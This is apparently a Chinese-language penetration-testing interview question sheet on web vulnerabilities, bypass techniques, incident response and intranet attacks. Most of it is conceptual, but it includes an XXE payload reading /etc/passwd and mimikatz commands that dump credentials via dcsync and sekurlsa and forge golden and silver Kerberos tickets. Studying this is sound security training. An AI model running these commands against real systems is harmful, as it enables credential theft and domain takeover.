php爆絕對路徑方法?
單引號引起數據庫報錯
訪問錯誤參數或錯誤路徑
探針類文件如phpinfo
掃描開發未刪除的測試文件
google hacking
phpmyadmin報路徑:/phpmyadmin/libraries/lect_lang.lib.php
利用漏洞讀取配置文件找路徑
惡意使用網站功能,如本地圖片讀取功能讀取不存在圖片,上傳點上傳不能正常導入的文件
你常用的滲透工具有哪些,最常用的是哪個?
burp、nmap、sqlmap、awvs、蟻劍、冰蠍、dirsearch、御劍等等
xss盲打到內網服務器的利用
釣魚管理員
信息收集
魚叉式攻擊和水坑攻擊?
魚叉攻擊:指利用木馬程序作為電子郵件的附件,發送到目標電腦上,誘導受害者去打開附件來感染木馬
水坑攻擊:分析攻擊目標的上網活動規律,尋找攻擊目標經常訪問的網站的弱點,將網站攻破並植入惡意程序,等待目標訪問
什么是虛擬機逃逸?
利用虛擬機軟件或者虛擬機中運行的軟件的漏洞進行攻擊,以達到攻擊或控制虛擬機宿主操作系統的目的
中間人攻擊?
原理:
在同一個局域網中,通過攔截正常的網絡通信數據,並進行數據篡改和嗅探
防御:
在主機綁定網關MAC與IP地址為靜態
在網關綁定主機MAC與IP地址
使用ARP防火牆
TCP三次握手過程?
第一次握手:建立連接時,客戶端發送syn包(syn=j)到服務器,並進入SYN_SEND狀態,等待服務器確認
第二次握手:服務器收到syn包,必須確認客戶的SYN(ack=j+1),同時自己也發送一個SYN包(syn=k),即SYN+ACK包,此時服務器進入SYN_RECV狀態
第三次握手:客戶端收到服務器的SYN+ACK包,向服務器發送確認包ACK(ack=k+1),此包發送完畢,客戶端和服務器進入ESTABLISHED狀態,完成三次握手
七層模型?
應用層、表示層、會話層、傳輸層、網絡層、數據鏈路層、物理層
對於雲安全的理解
融合了並行處理、網格計算、未知病毒行為判斷等新興技術和概念,通過網狀的大量客戶端對網絡中軟件行為的異常監測,獲取互聯網中木馬、惡意程序的最新信息,傳送到Server端進行自動分析和處理,再把病毒和木馬的解決方案分發到每一個客戶端
了解過websocket嗎?
WebSocket是一種在單個TCP連接上進行全雙工通信的協議,最大特點是服務器可以主動向客戶端推送信息,客戶端也可以主動向服務器發送信息,是真正的雙向平等對話。
DDOS是什么?有哪些?CC攻擊是什么?區別是什么?
DDOS:
分布式拒絕服務攻擊,利用合理的服務請求來占用過多的服務資源,從而使合法用戶無法得到服務的響應
主要方式:
SYN Flood
UDP Flood
ICMP Flood
Connection Flood
HTTP Get
UDP DNS Query Flood
CC攻擊:
模擬多個正常用戶不停地訪問如論壇這些需要大量數據操作的頁面,造成服務器資源的浪費,CPU長時間處於100%,網絡擁塞
兩者區別:
CC攻擊網頁,DDOS攻擊服務器,更難防御
CC門檻較低,DDOS需要大量服務器
CC持續時間長,DDOS產生的影響大
land攻擊是什么
局域網拒絕服務攻擊,DDOS攻擊的一種,通過發送精心構造的、具有相同源地址和目標地址的欺騙數據包,致使缺乏相應防護機制的目標設備癱瘓
你會如何進行信息收集?
服務器信息:ip、中間件、操作系統
域名whois、ipwhois、網段歸屬
子域名探測
網站目錄掃描、接口信息掃描
端口掃描
各大引擎搜索相關信息
什么是CRLF注入攻擊?
通過“回車”和“換行”字符注入HTTP流,實現網站篡改、跨站腳本、劫持等。
防止XSS,前端后端兩個角度?
前端:
用戶輸入特殊字符過濾轉義為html實體
用戶輸出編碼
后端:
實體化編碼
函數過濾
限制字符長度
如何防護一個端口的安全?
利用WAF、IDS、IPS等設備
危險服務端口禁止對外訪問或限制IP訪問
服務定期更新版本
webshell檢測思路?
靜態檢測:匹配特征碼,特征值,危險函數
動態檢測:WAF、IDS等設備
日志檢測:通過IP訪問規律,頁面訪問規律篩選
文件完整性監控
發現IIS的網站,怎樣試它的漏洞?(根據版本)
https://mp.weixin.qq.com/s/5XV984kErF2Zhh-P5aoUwQ
SQL注入問題總結
https://mp.weixin.qq.com/s/frwK49IatUqUoT-4DR08GQ
GPC是什么?開啟了怎么繞過
GPC:
php.ini配置文件中的magic_quotes_gpc,實現為get、post、cookie傳入的單引號、雙引號、反斜線、NULL字符添加反斜線
\
繞過:
PHP5的GPC對$_SERVER的忽略,可在http請求頭注入
二次注入
寬字節注入
web常用的加密算法有什么
單向散列加密 MD5、SHA、MAC
對稱加密 AES、DES
非對稱加密 RSA、RSA2
XSS除了獲取cookies還能做什么?
獲取管理員ip
xss蠕蟲
釣魚攻擊
前端JS挖礦
鍵盤記錄
屏幕截圖
運營商(或其他)網絡劫持
運營商劫持:廣告投放
DNS劫持:通過各種手段篡改DNS,劫持網絡
DNS欺騙是什么
攻擊者冒充域名服務器的一種欺騙行為
緩沖區溢出原理和防御
原理:
當寫入緩沖區的數據量超過該緩沖區所能承受的最大限度時,發生緩沖區溢出,溢出的數據被黑客加以利用,形成遠程代碼執行漏洞。
防御:
基於操作系統防御
緩沖區邊界檢查
安全編程
網絡安全事件應急響應
斷網:條件允許時優先斷網,防止黑客進一步操作或刪除痕跡
取證:通過分析登錄日志、網站日志、服務日志尋找黑客ip,查看黑客進行的操作
備份:備份服務器文件,對比入侵前后產生變化的文件
查漏:通過上述步驟尋找業務薄弱點,修補漏洞
殺毒:清除黑客留下的后門、webshell、管理賬號
溯源:通過黑客ip地址,入侵手段等
記錄:歸檔、預防
企業內部安全
實名制聯網
重要網段隔離
禁止接入任何USB設備
禁用WIFI網絡
IP與MAC地址綁定
部署網絡監控、IDS、IPS設備
定期培訓,提高員工安全意識
業務上線前,怎么測試,從哪些角度測試
安全測試:尋找產品漏洞,頁面漏洞,服務漏洞,敏感信息泄露,邏輯漏洞,弱口令
性能測試:壓力測試
功能完整性測試
應用有漏洞,但是無法修復和停用,你怎么辦
限制IP白名單訪問
使用WAF、IDS、防火牆設備
CSRF怎么防護?
驗證HTTP Referer字段
添加Token字段並驗證
添加自定義字段並驗證
文件上傳繞過方法?
WAF繞過:
修改上傳表單字段
表單字段大小寫替換
表單字段增加或減少空格
表單字段字符串拼接
構造雙文件上傳表單,同時上傳雙文件
編碼繞過
垃圾數據填充繞過
文件名大小寫繞過
服務器檢測繞過:
MIME類型繞過
前端JS檢測抓包改包繞過
黑名單繞過:php3、asa、ashx、windows特性(test.asp_、流特性)、apache解析漏洞
圖片內容檢測使用圖片馬繞過
.htassess繞過
白名單檢測繞過:
截斷上傳繞過
IIS6/7/7.5解析漏洞,nginx低版本解析漏洞
文件包含繞過
驗證碼相關利用點
驗證碼復用
驗證碼可識別
驗證碼失效
驗證碼DDOS
cookie你會測試什么內容
sql注入
xss
權限繞過
敏感信息泄露
說出幾個業務邏輯漏洞類型?
任意用戶密碼重置
短信轟炸
訂單金額修改
忘記密碼繞過
惡意刷票
驗證碼復用
簡述文件包含漏洞
調用文件包含函數時,未嚴格限制文件名和路徑,如include()、require()等函數
業務邏輯漏洞,用戶任意密碼重置有什么例子,因為什么因素導致的?
普通用戶重置管理用戶密碼
普通用戶重置普通用戶密碼
未設置用戶唯一Token,導致越權
滲透測試過程中發現一個只能上傳zip文件的功能,有什么可能的思路?
shell壓縮上傳,程序自解壓getshell
嘗試解析漏洞getshell
尋找文件包含漏洞
木馬釣魚管理員
為什么aspx木馬權限比asp大?
aspx使用的是.net技術,IIS中默認不支持,ASPX需要依賴於.net framework,ASP只是腳本語言
入侵的時候asp的木馬一般是guest權限APSX的木馬一般是users權限
只有一個登錄頁面有哪些思路?
SQL注入、萬能密碼
暴力破解
權限繞過
目錄掃描
敏感信息泄露
請求頭中哪些是有危害的?
COOKIE注入
user-agent注入
X-Forwarded-For注入
Referer注入
談談水平/垂直/未授權越權訪問的區別?
水平越權:普通用戶越權訪問普通用戶
垂直越權:普通用戶越權訪問管理用戶
未授權訪問:權限控制不嚴,導致無需登錄訪問已登錄用戶頁面
xss有什么?執行存儲型的xss的危害和原理
存儲型、反射型、DOM型
存儲型XSS是指應用程序通過Web請求獲取不可信賴的數據,在未檢驗數據是否存在XSS代碼的情況下,便將其存入數據庫
存儲型XSS危害:
竊取用戶Cookie
XSS釣魚攻擊
XSS蠕蟲攻擊
獲取鍵盤記錄
獲取用戶信息
獲取屏幕截圖
主機疑似遭到入侵,要看哪里的日志
系統登錄日志
服務訪問日志
網站日志
數據庫日志
python常用的標准庫
正則表達式 re
時間模塊 time
隨機數 random
操作系統接口 os
科學計算 math
網絡請求 urlib
http庫 requests
爬蟲庫 Scrapy
多線程庫 threading
reverse_tcp 和 bind_tcp 的區別?
reverse_tcp:攻擊機設置一個端口和IP,Payload在測試機執行連接攻擊機IP的端口,這時如果在攻擊機監聽該端口會發現測試機已經連接
白話就是讓受控機主動連接我們
bind_tcp:攻擊機設置一個端口(LPORT),Payload在測試機執行打開該端口,以便攻擊機可以接入
白話就是我們主動連接受控機
使用reverse_tcp較為安全,一般不會被防火牆發現
oauth認證過程中可能會出現什么問題,導致什么樣的漏洞?
CSRF
redirect_uri校驗不嚴格
錯誤的參數傳遞
做了cdn的網站如何獲取真實IP
全球ping
查詢歷史解析記錄
探針文件如phpinfo等
利用命令執行連接我們的服務器或DNSlog
尋找網站配置
通過二級域名
全網掃描,title匹配
如何實現跨域?
jsonp
CORS跨域資源共享
代理跨域請求
Html5 postMessage 方法
修改 document.domain 跨子域
基於 Html5 websocket 協議
document.xxx + iframe
jsonp跨域與CORS跨域的區別?
jsonp瀏覽器支持較好,CORS不支持IE9及以下瀏覽器
jsonp只支持GET,CORS支持所有類型的HTTP請求
jsonp只發一次請求,復雜請求CORS發送兩次
算法?了解過什么排序?
冒泡排序
選擇排序
插入排序
SSRF漏洞利用?
本地文件讀取
服務探測、端口掃描
攻擊內網redis、mysql、fastcgi等服務
- 利用到的協議有:http/s、file、gopher、tftp、dict、ssh、telnet
常見后門方式?
Windows:
注冊表自啟動
shift后門
遠控軟件
webshell
添加管理用戶
影子用戶
定時任務
dll劫持
注冊表劫持
MBR后門
WMI后門
管理員密碼記錄
Linux:
SSH后門
SUID后門
Crontab計划任務
PAM后門
添加管理員賬號
Rootkit
open_basedir訪問目錄限制繞過方法?
使用命令執行函數繞過
使用symlink()函數繞過
glob偽協議繞過
PHP代碼審計中容易出問題的點?
參數拼接方式皆有可能產生SQL注入(老生常談)
全局變量注冊導致的變量覆蓋
fwrite參數未過濾導致的代碼執行
權限校驗疏漏導致的后台功能訪問
接口任意文件上傳
unserialize反序列化漏洞
紅藍對抗中藍隊反殺紅隊場景和姿勢?
釣魚、蜜罐、蟻劍RCE
linux計划任務,黑客隱藏自己的計划任務會怎么做?
臨時任務:at、batch命令
Redis未授權常見getshell的幾種方式?
web絕對路徑寫shell
寫入ssh公鑰獲取服務器權限
主從復制getshell
JWT的攻擊手法?(頭部、負載、簽名)
加密算法置為空繞過身份驗證
爆破弱密鑰
kid參數:任意文件讀取、SQL注入、命令注入
未校驗簽名,內容重新編碼
JAVA中間件的漏洞,舉幾個例子?
JBoss反序列化
WebLogic反序列化
tomcat任意文件寫入、弱口令+后台getshell
DNS外帶可以用在哪些漏洞?
SQL盲注
無回顯的命令執行
XXE盲打
SSRF盲打
HTTP-Only禁止的是JS讀取cookie信息,如何繞過這個獲取cookie
劫持登錄頁面釣魚繞過
中間件漏洞總結?
這里只寫常利用的漏洞
IIS:
IIS6.0 PUT漏洞
IIS6.0 遠程代碼執行漏洞
IIS6.0 解析漏洞
IIS啟用.net 短文件名漏洞
IIS7.0/7.5 解析漏洞
Apache:
未知擴展名解析漏洞
配合錯誤導致的解析漏洞、目錄遍歷
Nginx:
配置錯誤導致的解析漏洞、目錄遍歷
Tamcat:
配置錯誤導致的任意代碼執行、任意文件寫入漏洞
弱口令+管理后台war包部署getshell
manager/html 管理后台弱口令爆破
JBoss:
5.x/6.x反序列化漏洞(CVE-2017-12149)
JMXInvokerServlet反序列化
EJBInvokerServlet反序列化
JMX Console未授權訪問
弱口令+管理后台war包部署getshell
WebLogic:
XMLDecoder 反序列化漏洞(CVE-2017-10271 & CVE-2017-3506)
wls9_async_response,wls-wsat 反序列化遠程代碼執行漏洞(CVE-2019-2725)
WLS Core Components 反序列化命令執行漏洞(CVE-2018-2628)
弱口令+管理后台war包部署getshell
談一談Windows系統與Linux系統提權的思路?
Windows:
數據庫提權:mysql、sqlserver
第三方軟件提權:serv-u
DLL劫持
系統內核溢出漏洞提權:cve系列
Linux:
sudo提權
suid提權
redis
內核提權
python有哪些框架,其中出現過哪些漏洞
Django、Flask、Scrapy
Django任意代碼執行
Flask模板注入
小程序的滲透和普通滲透的差異
滲透過程不變,依舊是抓包修改參數滲透
不同點是小程序會將包下載到本地,可以使用逆向還原工具反編譯
app本身的漏洞測試 四大組件
Activity組件:
activity綁定browserable與自定義協議
ActivityManager漏洞
Service組件:
權限提升,拒絕服務攻擊
Broadcast Receiver組件:
權限管理不當
BroadcastReceiver導出漏洞
動態注冊廣播組件暴露漏洞
Content Provider組件:
讀寫權限漏洞
Content Provider中的SQL注入漏洞
Provider文件目錄遍歷漏洞
IDS/IPS防護原理及繞過思路
原理:
IDS工作在網絡層,旁路部署,通過抓取和分析網絡流量來發現攻擊
IPS一般也是在網絡層旁路,可以理解為具備阻斷能力的IDS,是IDS的升級版(也有IDS檢測到攻擊通知阻斷設備執行阻斷動作的設備聯動模式),可以覆蓋網絡層和應用層
繞過:
TCP分片:拆分出兩個TCP包
IP分片:原理同TCP分片,但是丟包嚴重
程序bug/性能問題:發送大量無效包,消耗IPS性能
偽造TCP狀態:繞過基於狀態追蹤的IPS
IPV6繞過:使用IPV6地址繞過
json的csrf的利用
使用XMLHttpRequest、fetch構造出JSON請求,利用Flash的跨域與307跳轉來繞過http自定義頭限制
json格式的數據包可以測哪些漏洞
csrf
json劫持
xss
簡述xxe漏洞原理與利用方式
原理:
XML外部實體注入,在應用程序解析XML輸入時,當允許引用外部實體時,可構造惡意內容,產生漏洞
利用:
DTD Document Type Definition
DTD 內部聲明
<!DOCTYPE 根元素 [元素聲明]>
DTD 外部引用
<!DOCTYPE 根元素名稱 SYSTEM “外部DTD的URI”>
引用公共DTD
<!DOCTYPE 根元素名稱 PUBLIC “DTD標識名” “公用DTD的URI”>
ENTITY
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY x "First Param!">
<!ENTITY y "Second Param!">
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root><x>&x;</x><y>&y;</y><xxe>&xxe;</xxe></root
圖片來自網絡
內網服務器,如何進行信息收集?
使用腳本收集:端口信息、服務信息
系統命令收集:域內用戶可使用域命令收集域信息,net group "domain users" /domain等
端口掃描工具全段掃描
本機信息收集:管理密碼、登錄日志看管理員ip、服務密碼收集、網段信息查看、歷史記錄查看
內網DNS域傳送漏洞
如果拿下了內網邊界層的某一個機器,如何對內網其他進行探測?
首先使用代理進入內網reg、ew等
第二在本機進行信息收集,包括管理員ip、端口服務、賬號密碼、路由信息、網段信息等
第三擴展到收集到的網段進行滲透,利用常用服務:SMB、MYSQL、SQLserver、ftp、telnet等
借助輕量化腳本或掃描器掃描,但一般不這么做,動靜太大容易被管理員發現
內網黃金票據、白銀票據的區別和利用方式
圖片來自網絡
黃金票據:
一旦攻擊者擁有管理員訪問域控制器的權限,就可以使用Mimikatz來提取KRBTGT帳戶密碼哈希值。
mimikatz log "lsadump::dcsync /domain:test.local /user:krbtgt"
生成票據
kerberos::golden /admin:Administrator /domain:CTU.DOMAIN /sid:S-1-1-12-123456789-1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999 /ticket:Administrator.kiribi
/admin:偽造的用戶名
/domain:域名稱
/sid:SID值,注意是去掉最后一個-后面的值
/krbtgt:krbtgt的HASH值
/ticket:生成的票據名稱 //不是寫入內存中的命令!
普通域賬戶,利用黃金票據,創建域管賬戶
mimikatz # kerberos::purge
mimikatz # kerberos::ptt Administrator.kiribi //票據導入內存
此時域管賬號創建成功
白銀票據:
獲取SID和NTLM
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit">log.txt
偽造票據
kerberos::golden /domain:cyberpeace.com /sid:S-1-5-21-2718660907-658632824-2072795563 /target:scene.abcd.com /service:cifs /rc4:9a68826fdc2811f20d1f73a471ad7b9a /user:test /ptt
//使用方法
kerberos::golden /domain:<域名> /sid:<域 SID> /target:<目標服務器主機名> /service:<服務類型> /rc4:<NTLM Hash> /user:<用戶名> /ptt
針對服務名偽造
成功獲取域管賬號
dir \\scene.cyberpeace.com\c$
金票銀票區別:
獲取的權限不同
金票:偽造的TGT,可以獲取任意Kerberos的訪問權限
銀票:偽造的ST,只能訪問指定的服務,如CIFS
認證流程不同
金票:同KDC交互,但不同AS交互
銀票:不同KDC交互,直接訪問Server
加密方式不同
金票:由krbtgt NTLM Hash 加密
銀票:由服務賬號 NTLM Hash 加密